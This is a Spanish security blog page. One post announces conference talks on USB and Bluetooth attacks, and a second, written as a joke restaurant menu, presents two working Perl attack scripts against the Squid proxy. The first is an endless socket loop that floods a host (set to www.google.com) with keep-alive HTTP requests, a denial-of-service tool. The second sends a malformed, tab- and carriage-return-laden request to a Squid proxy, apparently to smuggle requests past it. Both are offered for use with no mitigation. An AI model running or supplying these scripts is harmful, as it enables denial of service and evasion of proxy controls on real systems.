Los Caballeros

"Sobre seguridad, programación, modding, frikismo, etc... "

Los caballeros en FreeSecurity

Twitter icon Twitter icon
De momento estamos confirmados dos de los miembros para dar conferencia en el evento de seguridad informática: Freesecurity.

http://freesecurity.mx/yacomas/aceptadas/

Los temas de conferencia serán:

USB Hacking
La seguridad física cómo un factor critico desde el ambiente domestico al empresarial. Se trataran temas de ingeniería inversa a dispositivos USB, fuzzing, 0days y muchos más...
Y el estreno de una nueva herramienta de pentesting: UAT (USB Attack Toolkit)

Seguridad en Sistemas Azules

Bluetooth es uno de esos protocolos que no se toman en cuenta cuando se realiza un pentesting, dentro de una empresa un dispositivo vulnerable puede ser fácilmente utilizado por un atacante para tomar control de información vital. Se mostraran técnicas utilizadas por atacantes así cómo métodos para mantenernos seguros de este tipo de ataques.

Ambas conferencias se mostraran desde el punto de vista de un atacante y del usuario.

Saludos!

Squid Proxy... yo no lo utilizaría

Twitter icon Twitter icon


Bienvenido al Restaurante de "Los Caballeros", el día de hoy tenemos un especial de calamar, esperamos que todos nuestros platillos sean de su agrado.

De entrada tenemos un platillo un poco pesado: Calamares bien rellenos a la "Los Caballeros" (platillo para DoS personas).

Este platillo es muy similar a FHTTP sobre una cama de Apache o IIS, es un poco fuerte al gusto, la diferencia es que en este caso tiene calamar y esta aderezado con un poco de Perl.
use IO::Socket::INET;
my $host = "www.google.com";
my $requests = 10;
my $payload = ("GET http://".$host."/ HTTP/1.1\nConnection: keep-alive\n\n")x($requests);
while(1) {
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 'http(80)',Proto => 'tcp');
die("Se quemo!") unless($sock);
print $sock $payload;
close($sock);
}


De platillo fuerte tenemos: Calamar del Infierno.
Tal y como su nombre lo indica es un calamar muy raro, bastante difícil de atrapar (seguramente a los pescadores les dio en verdadero dolor de cabeza), debido a que ha desarrollado grandes capacidades para ocultarse de diferentes formas en su habitad natural. Pero solo por hoy lo traemos para que usted lo deguste.

use IO::Socket;
use threads;
use threads::shared;
$squid = "localhost";
$squidport = "3128";
$path = "/index.php";
$host = "localhost";
$host =~ s/([^\t])/$1\t/g;
$pay = "\tGET\thttp://".$host.$path."?basura=\tHTTP/\rGET /echo.php\r\nGET nanananananananananananananananabatmanbatman HTTP/\rHost: squid-house\nCatch: me\rif\ryu\rcan\nConnection: keep-alive\n\n";
print "Sending...\n";
my $sock = new IO::Socket::INET(
PeerAddr => $squid,
PeerPort => $squidport,
Proto => 'tcp',
);
die "Se quemo! $!\n" unless $sock;
print $sock $pay;
while(<$sock>) {
print $_;
}
close($sock);

De postre se le apetece un helado?

Gracias por su visita y vuelta pronto :)